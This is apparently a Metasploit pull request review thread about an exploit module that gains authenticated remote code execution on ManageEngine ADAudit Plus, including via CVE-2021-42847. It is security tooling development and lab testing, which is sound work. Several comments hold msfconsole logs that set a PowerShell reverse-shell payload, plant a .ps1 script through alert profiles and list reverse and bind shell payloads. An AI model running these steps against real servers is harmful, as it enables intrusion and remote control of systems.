2023-03-22 20:40 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +  #   of Strings for the configured domain aliases.
Sounds good thanks for doing this!

2023-03-22 20:46 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        end
Yep your correct, this is my bad. Marking resolved.

2023-04-21 13:17 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +        return CheckCode::Unknown("The target is ADAudit Plus #{build_version} but the connection failed when checking for the CVE-2021-42847 endpoint")
agreed and fixed

2023-04-21 13:17 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/target_info.rb
> +  #   and a 'domain_aliases' key, which is used to hold an Array
fixed

2023-04-21 13:19 UTC, ErikWynter commented
@gwillcox-r7 I just pushed a few minor changes for things that were still unresolved. Do you have any idea when you'll be able to look at this one again? I think it should be about ready to get landed

2023-04-23 19:12 UTC, gwillcox-r7 commented
> @gwillcox-r7 I just pushed a few minor changes for things that were still unresolved. Do you have any idea when you'll be able to look at this one again? I think it should be about ready to get landed

Hey @ErikWynter I'm on research this coming week but I should be able to review it the following week when I'm back on PRs. Sorry for the delay on this one, was on vacation for a month so that was the reason this has been a bit delayed.

2023-05-01 21:56 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/json_post_data.rb
> +  # @return [String] A string representation of the JSON hash matching the
Resolved with https://github.com/rapid7/metasploit-framework/pull/17133/commits/571d92a93af21b6b8102fbcd7c7709d83ff533c6

2023-05-01 21:57 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +  #   the ManageEngine ADAudit Plus target.
Resolved with updates to the libraries in https://github.com/rapid7/metasploit-framework/pull/17133/commits/571d92a93af21b6b8102fbcd7c7709d83ff533c6 to make sure they all return at least a status code and a message at minimum.

2023-05-03 12:51 UTC, ErikWynter commented on lib/rex/proto/ms_dtyp.rb
> +      "{#{Rex::Text.rand_text_alphanumeric(8)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(
@gwillcox-r7 actually this should be hexidecimal digits, so `a-f` are allowed as well. Taken from the documentation:
```
[...] the value of the GUID is represented as a series of lowercase hexadecimal digits in groups of 8, 4, 4, 4, and 12 digits and separated by hyphens. An example of a return value is "382c74c3-721d-4f34-80e5-57657b6cbc27"
```
It seems that `rand_text_hex`  would be what we need here, but haven't tested it yet. I'll look into that though

2023-05-04 09:05 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    end
@gwillcox-r7 I think this is a repetition of a previous discussion. The scenario you mean is when the `NO_DOMAINS` status is returned by `adaudit_plus_grab_configured_domains`, which is the method called by the login method. However, that status can never be returned when performing a login because `adaudit_plus_login` calls `adaudit_plus_grab_configured_domains` with the `only_get_cookie` param  set to `true` , in which case `adaudit_plus_grab_configured_domains` will always return earlier with one of the status codes covered in the case statement.

Even if future library changes would make it possible for the status code `NO_DOMAINS` to be returned here, we would still be fine because exploitation cannot succeed if no domains are found, so we would need to fail flat out in that case anyway. Imo this is sufficiently future proof because the login mechanism of ADAudit Plus is very finicky and if the conditions for a  `SUCCESS`  status are not reached, it is guaranteed that we cannot proceed. I can generally only imagine the future addition of new failure statuses to these methods, which would not be a problem, because those should all return a `login_msg` to inform the user of the exact error.

After our previous discussion about this, I added comments in some places where this module calls the `adaudit_plug_login` method to clarify this, so I will do that here as well:
```
        # this covers other potential statuses that this method may return in the future
        # note that here the login method should never return adaudit_plus_status::NO_DOMAINS
        # however, if it would do so due to some library change, treating it as an unknown failure makes sense
```

2023-05-04 09:12 UTC, ErikWynter commented on lib/rex/proto/ms_dtyp.rb
> +      "{#{Rex::Text.rand_text_alphanumeric(8)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(4)}-#{Rex::Text.rand_text_alphanumeric(
fixed this now

2023-05-04 09:13 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    end
good point. I added a check to ensure this is ADAudit Plus, and also a check for the cookie name and format

2023-05-04 09:13 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    unless res_login.code == 303 && res_login.headers.include?('Set-Cookie')
agreed. I added a check for the expected names and format of the cookies we are setting here

2023-05-04 09:17 UTC, ErikWynter commented
@gwillcox-r7 thanks for the additional comments! I added the extra checks that were missing in the library, fixed the GUID format in the rex library and added a comment to clarify the return statuses for the `login` method, in line with how we solved this elsewhere in the module. I added explanations for two issues that I left open so you can look at those. I hope that will resolve them, but otherwise let me know. And feel free to make any final improvements :)

2023-05-04 16:36 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    end
Check looks good!

2023-05-04 16:40 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    unless res_login.code == 303 && res_login.headers.include?('Set-Cookie') && ['JSESSIONIDADAP', 'JSESSIONIDSSO'].all? { |cookie_name| res_login.get_cookies =~ /#{cookie_name}=[A-F0-9]{32}/ }
Not sure if this is meant to be always uppercase; if so then this is fine, otherwise it may be worth adding the lowercase letters as well to avoid false negatives.

2023-05-04 16:40 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    unless res_login.code == 303 && res_login.headers.include?('Set-Cookie')
New check looks good!

2023-05-04 17:03 UTC, gwillcox-r7 commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    end
I think I overlooked this. If we intend for SUCCESS to be the only success condition then this will be fine and is properly checked. The `else` condition however is not very future proof for any unknown conditions we may add in the future.

2023-05-04 18:39 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    unless res_login.code == 303 && res_login.headers.include?('Set-Cookie') && ['JSESSIONIDADAP', 'JSESSIONIDSSO'].all? { |cookie_name| res_login.get_cookies =~ /#{cookie_name}=[A-F0-9]{32}/ }
After further talks this was confirmed to always be uppercase. Marking as resolved.

2023-05-04 18:41 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    # check if we have a new adapcsrf cookie with the expected format, which is different from the initial adapcsrf cookie format
Seems this occurs after visiting the adaudit_plus_jump_to_js_uri URI. I'll add an update to the comment to better explain this, otherwise no issues.

2023-05-04 18:47 UTC, gwillcox-r7 commented
@ErikWynter Alright this looks good to test and land. Will let you know if I encounter any errors whilst testing.

2023-05-04 19:29 UTC, ErikWynter commented on modules/exploits/windows/http/manageengine_adaudit_plus_authenticated_rce.rb
> +    end
Ah gotcha. I was not sure what you had in mind before regarding the else condition, so thanks for clarifying. I added the else condition based on the idea that if someone would add something to the library that would make additional return codes possible, the script would exit gracefully instead of potentially continuing and breaking somewhere later. But I'm fine with you removing it if you prefer.

2023-05-04 19:31 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    unless res_login.code == 303 && res_login.headers.include?('Set-Cookie') && ['JSESSIONIDADAP', 'JSESSIONIDSSO'].all? { |cookie_name| res_login.get_cookies =~ /#{cookie_name}=[A-F0-9]{32}/ }
Yup as mentioned I've only seen it in uppercase. You could double check during testing but I'd be surprised if it's different for other versions than the ones I've worked with

2023-05-04 19:32 UTC, gwillcox-r7 approved these changes

2023-05-04 19:41 UTC, ErikWynter commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/login.rb
> +    # check if we have a new adapcsrf cookie with the expected format, which is different from the initial adapcsrf cookie format
Yeah so the adapcsrf cookie can have two possible formats from what I found. Upon connecting for the first time, the server will tell the client to set a relatively short adapcsrf cookie. If the client uses that in a request to a specific js endpoint, the server will tell the client to set the adapcsrf cookie value to a very long hex value instead. That second cookie is the one that can be used for authentication. The first one cannot. You could add this explanation as a comment if you think it's helpful

2023-05-04 19:48 UTC, gwillcox-r7 commented
Hmm `check` isn't working against a default of 6.0.7 since to log in using those credentials you need to be using `ADAudit Plus Authentication` and we default to using the first domain available that is not that.

2023-05-04 19:51 UTC, gwillcox-r7 commented
Logging in I'm prompted to configure ADAudit GPOs for the domain. Clicking on this it says "Successfully configured audit policies" after a few seconds of it running. I'm still not able to log in using the DAFOREST domain that I have configured though even via the normal app and a web browser.

2023-05-04 20:04 UTC, gwillcox-r7 commented
After logging I looked over the alerts and it wanted me to make it use HTTPS, run as a service and also change the admin password using `http://localhost:8081/AppsHome.do?LogoutFromSSO=true#/admin/personalize` so went ahead and did that by clicking on the `Admin` tab in the banner, then entering the current password for `Old password`, the new password for `New password` and `Confirm password` and making sure `Log on to` was set to `DAFOREST` aka the domain I was interested in.

No luck on this either.

2023-05-04 20:08 UTC, gwillcox-r7 commented
Okay so after further investigation this is probably a bug in the new logic we added to `login.rb` so let me dig deeper into that.

2023-05-04 20:41 UTC, gwillcox-r7 commented
Fixed the login check bug with https://github.com/rapid7/metasploit-framework/pull/17133/commits/adec2f4fbba18c2395fabcb8e1c35b34a18c367f

2023-05-04 20:53 UTC, gwillcox-r7 commented
Hmm so that fixed some things but this is still failing against a 6077 target at the moment. Multiple retries are not getting any success and the targets firewall is completely disabled as is Windows Defender Realtime scanning:

```
msf6 > use exploit/windows/http/manageengine_adaudit_plus_authenticated_rce 
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set RHOSTS 192.168.204.129
RHOSTS => 192.168.204.129
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set LHOST 192.168.204.128
LHOST => 192.168.204.128
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set USERNAME admin
USERNAME => admin
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set PASSWORD admin123
PASSWORD => admin123
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > check

[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin123
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[*] 192.168.204.129:8081 - The target appears to be vulnerable. The target is ADAudit Plus 6077
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > exploit

[*] Started reverse TCP handler on 192.168.204.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin123
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 6077
[*] Attempting to create an alert profile
[+] Successfully created alert profile CPJRlc6SE
[*] Attempting to trigger the payload via an authentication attempt for domain DAFOREST using incorrect credentials.
[*] Received expected reply when trying to trigger the payload. Let's hope we get a shell...
[-] Failed to obtain a shell. You could try increasing the WfsDelay value
[*] Attempting to delete alert profile CPJRlc6SE
[+] Successfully deleted alert profile CPJRlc6SE
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > exploit

[*] Started reverse TCP handler on 192.168.204.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin123
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 6077
[*] Attempting to create an alert profile
[+] Successfully created alert profile 2VoMAdv1Nb
[*] Attempting to trigger the payload via an authentication attempt for domain DAFOREST using incorrect credentials.
[*] Received expected reply when trying to trigger the payload. Let's hope we get a shell...
[-] Failed to obtain a shell. You could try increasing the WfsDelay value
[*] Attempting to delete alert profile 2VoMAdv1Nb
[+] Successfully deleted alert profile 2VoMAdv1Nb
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > show options

Module options (exploit/windows/http/manageengine_adaudit_plus_authenticated_rce):

   Name         Current Setting             Required  Description
   ----         ---------------             --------  -----------
   AUTH_DOMAIN  ADAuditPlus Authentication  yes       ADAudit Plus authentication domain (default is ADAuditPlus Authentication)
   PASSWORD     admin123                    yes       Password to authenticate with
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.204.129             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        8081                        yes       The target port (TCP)
   SSL          false                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                           yes       The base path to ManageEngine ADAudit Plus
   USERNAME     admin                       yes       Username to authenticate with
   VHOST                                    no        HTTP server virtual host


Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         192.168.204.128  yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set WfsDelay 30
WfsDelay => 30
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > exploit

[*] Started reverse TCP handler on 192.168.204.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin123
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 6077
[*] Attempting to create an alert profile
[+] Successfully created alert profile TTlk2rvXe1
[*] Attempting to trigger the payload via an authentication attempt for domain DAFOREST using incorrect credentials.
[*] Received expected reply when trying to trigger the payload. Let's hope we get a shell...
[-] Failed to obtain a shell. You could try increasing the WfsDelay value
[*] Attempting to delete alert profile TTlk2rvXe1
[+] Successfully deleted alert profile TTlk2rvXe1
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set PAYLOAD 
Display all 320 possibilities? (y or n)
set PAYLOAD cmd/windows/adduser                                                set PAYLOAD cmd/windows/powershell/shell/bind_named_pipe
set PAYLOAD cmd/windows/bind_lua                                               set PAYLOAD cmd/windows/powershell/shell/bind_nonx_tcp
set PAYLOAD cmd/windows/bind_perl                                              set PAYLOAD cmd/windows/powershell/shell/bind_tcp
set PAYLOAD cmd/windows/bind_perl_ipv6                                         set PAYLOAD cmd/windows/powershell/shell/bind_tcp_rc4
set PAYLOAD cmd/windows/bind_ruby                                              set PAYLOAD cmd/windows/powershell/shell/bind_tcp_uuid
set PAYLOAD cmd/windows/download_eval_vbs                                      set PAYLOAD cmd/windows/powershell/shell/reverse_ipv6_tcp
set PAYLOAD cmd/windows/download_exec_vbs                                      set PAYLOAD cmd/windows/powershell/shell/reverse_nonx_tcp
set PAYLOAD cmd/windows/generic                                                set PAYLOAD cmd/windows/powershell/shell/reverse_ord_tcp
set PAYLOAD cmd/windows/jjs_reverse_tcp                                        set PAYLOAD cmd/windows/powershell/shell/reverse_tcp
set PAYLOAD cmd/windows/powershell/adduser                                     set PAYLOAD cmd/windows/powershell/shell/reverse_tcp_allports
set PAYLOAD cmd/windows/powershell/custom/bind_hidden_ipknock_tcp              set PAYLOAD cmd/windows/powershell/shell/reverse_tcp_dns
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set PAYLOAD cmd/wind [...]

2023-05-04 21:11 UTC, ErikWynter commented
@gwillcox-r7 hmm that's odd. As a sanity check, you could put a breakpoint after the creation of the alert script, then check the contents of that file on the test system and manually try to execute it to see if you can get a shell that way

2023-05-04 21:46 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/manageengine_adaudit_plus_authenticated_rce.md
> +and then running: `<install_dir>\bin\run.bat`.
Should mention here that one should not accept the default option to `Start ADAudit Plus Server` after installing. This will not work.

2023-05-04 21:58 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/manageengine_adaudit_plus_authenticated_rce.md
> +and then running: `<install_dir>\bin\run.bat`.
Should add more details about how old versions may not allow you to enter into Evaluation mode cause apparently they think that the Evaluation Edition has expired 🙄

2023-05-04 22:01 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/manageengine_adaudit_plus_authenticated_rce.md
> +and then running: `<install_dir>\bin\run.bat`.
Weirdly 6077 didn't seem to ask for a license file when I started it via `run.bat`, so perhaps this might not always be the case?

2023-05-04 23:07 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/manageengine_adaudit_plus_authenticated_rce.md
> +and then running: `<install_dir>\bin\run.bat`.
ACTUAL STEPS
1. `cd "C:\Program Files\ManageEngine\ADAudit Plus\bin"`
2. `run.bat`
3. Log in to the admin portal. 
4. Default Domain Controllers Policy not configured for daforest.com <- Click on the Configure link on this.
5. Go to notifications, "Product Not Installed As Service" and click "Install Now"
6. Open Group Policy Management on the domain controller and go to Forest->Domains->Select your domain->Default Domain Policy and right click on it then click Edit.
7. Computer Configuration->Policies->Windows Settings->Security Settings->Advanced Audit Policy Configuration->Audit Policies->Logon/Logoff and set `Audit Logoff`, `Audit Logon` and `Audit Special Logon` and `Audit Other Logon/Logoff Events` and set them to `Configure the following audit events` and check that box and `Success` and `Failure`.
8. Log off
9. Should be able to run the module now.

2023-05-04 23:11 UTC, gwillcox-r7 commented on documentation/modules/exploit/windows/http/manageengine_adaudit_plus_authenticated_rce.md
> +and then running: `<install_dir>\bin\run.bat`.
Phew...okay that works. Lets update the documentation with this and then I think we should be good.

2023-05-04 23:29 UTC, gwillcox-r7 commented
Alright was able to get a shell on 6007 by updating some of the installation instructions. Going to do a quick run and then add that into the documentation as a demo and also test out a 7xxx version.

2023-05-05 01:12 UTC, gwillcox-r7 commented
Not sure if this is due to a unclean install or something else but after uninstalling 6077 and installing 7005 I got this when trying to exploit:

```
msf6 > use exploit/windows/http/manageengine_adaudit_plus_authenticated_rce
[*] Using configured payload cmd/windows/powershell_reverse_tcp
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set RHOSTS 192.168.204.132
RHOSTS => 192.168.204.132
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > set LHOST 192.168.204.128
LHOST => 192.168.204.128
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > show options

Module options (exploit/windows/http/manageengine_adaudit_plus_authenticated_rce):

   Name         Current Setting             Required  Description
   ----         ---------------             --------  -----------
   AUTH_DOMAIN  ADAuditPlus Authentication  yes       ADAudit Plus authentication domain (default is ADAuditPlus Authentication)
   PASSWORD     admin                       yes       Password to authenticate with
   Proxies                                  no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS       192.168.204.132             yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT        8081                        yes       The target port (TCP)
   SSL          false                       no        Negotiate SSL/TLS for outgoing connections
   TARGETURI    /                           yes       The base path to ManageEngine ADAudit Plus
   USERNAME     admin                       yes       Username to authenticate with
   VHOST                                    no        HTTP server virtual host


Payload options (cmd/windows/powershell_reverse_tcp):

   Name          Current Setting  Required  Description
   ----          ---------------  --------  -----------
   LHOST         192.168.204.128  yes       The listen address (an interface may be specified)
   LOAD_MODULES                   no        A list of powershell modules separated by a comma to download over the web
   LPORT         4444             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Windows Command



View the full module info with the info, or info -d command.

msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > check

[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[*] 192.168.204.132:8081 - The target appears to be vulnerable. The target is ADAudit Plus 7005 and the endpoint for CVE-2021-42847 exists.
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > exploit

[*] Started reverse TCP handler on 192.168.204.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 7005 and the endpoint for CVE-2021-42847 exists.
[*] Attempting to authenticate again in order to retrieve the required cookies.
[*] Attempting to create an alert profile
[*] Attempting to write the payload to /alert_scripts/dmhgsuj.ps1
[+] Successfully wrote the payload to /alert_scripts/dmhgsuj.ps1 in the ManageEngine ADAudit Plus install directory
[-] The server sent the following response: {"message":"Failure occured  :Script file doesnot exists in C:\\Program Files\\ManageEngine\\ADAudit Plus\\alert_scripts\\ folder"}
[-] Exploit aborted due to failure: unexpected-reply: Failed to create an alert profile via /api/json/config/alertprofiles/save
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > exploit

[*] Started reverse TCP handler on 192.168.204.128:4444 
[*] Running automatic check ("set AutoCheck false" to disable)
[*] Using configured authentication domain alias DAFOREST.
[*] Attempting to authenticate to ADAuditPlus Authentication with username: admin and password: admin
[*] Found 1 configured domain(s): daforest.com
[+] Successfully authenticated
[+] The target appears to be vulnerable. The target is ADAudit Plus 7005 and the endpoint for CVE-2021-42847 exists.
[*] Attempting to authenticate again in order to retrieve the required cookies.
[*] Attempting to create an alert profile
[*] Attempting to write the payload to /alert_scripts/npsqqyb.ps1
[+] Successfully wrote the payload to /alert_scripts/npsqqyb.ps1 in the ManageEngine ADAudit Plus install directory
[-] The server sent the following response: {"message":"Failure occured  :Script file doesnot exists in C:\\Program Files\\ManageEngine\\ADAudit Plus\\alert_scripts\\ folder"}
[-] Exploit aborted due to failure: unexpected-reply: Failed to create an alert profile via /api/json/config/alertprofiles/save
[*] Exploit completed, but no session was created.
msf6 exploit(windows/http/manageengine_adaudit_plus_authenticated_rce) > 
```

Looking at the server confirms that the alert isn't created over there either. Weirdly the server does seem to confirm it wrote the file though which makes this very odd as searching the entire C:\ drive I can't find any traces of that file.

2023-05-05 01:35 UTC, gwillcox-r7 commented
Fresh reinstall isn't solving the above issue. @ErikWynter do you have any idea what might be causing this?

2023-05-05 07:12 UTC, ErikWynter commented
@gwillcox-r7 sorry about that!! Seems that I accidentally renamed the `Html_fileName` param to `html_fileName` when moving stuff over to the mixin and that prevents the payload from being written to disk even though the POST request to the server will be valid, so it will respond with `success`. Fix this now and tested it. I sent you a demo video. Let me know if you run into anything else

2023-05-08 15:14 UTC, gwillcox-r7 commented on lib/msf/core/exploit/remote/http/manage_engine_adaudit_plus/json_post_data.rb
> +  # @option options [String] :Html_fileName The filename to use for the post request if provided.
This violates Ruby's camelCase styling so I think the original naming style was appropriate.

2023-05-08 17:11 UTC, gwillcox-r7 commented
@ErikWynter Everything looks good now. I'll get this landed once the tests pass 🥳

2023-05-08 18:25 UTC, merged

2023-05-08 18:27 UTC, gwillcox-r7 commented
# Release Notes
A new exploit module has been added which gains authenticated RCE on ManageEngine AdAudit builds 7005 and prior by creating a custom alert profile and leveraging the custom alert script component. On builds 7004 and later, [CVE-2021-42847](https://github.com/advisories/GHSA-8fpx-82w4-947r) is utilized to gain RCE via an arbitrary file write to create the necessary script for the alert profile.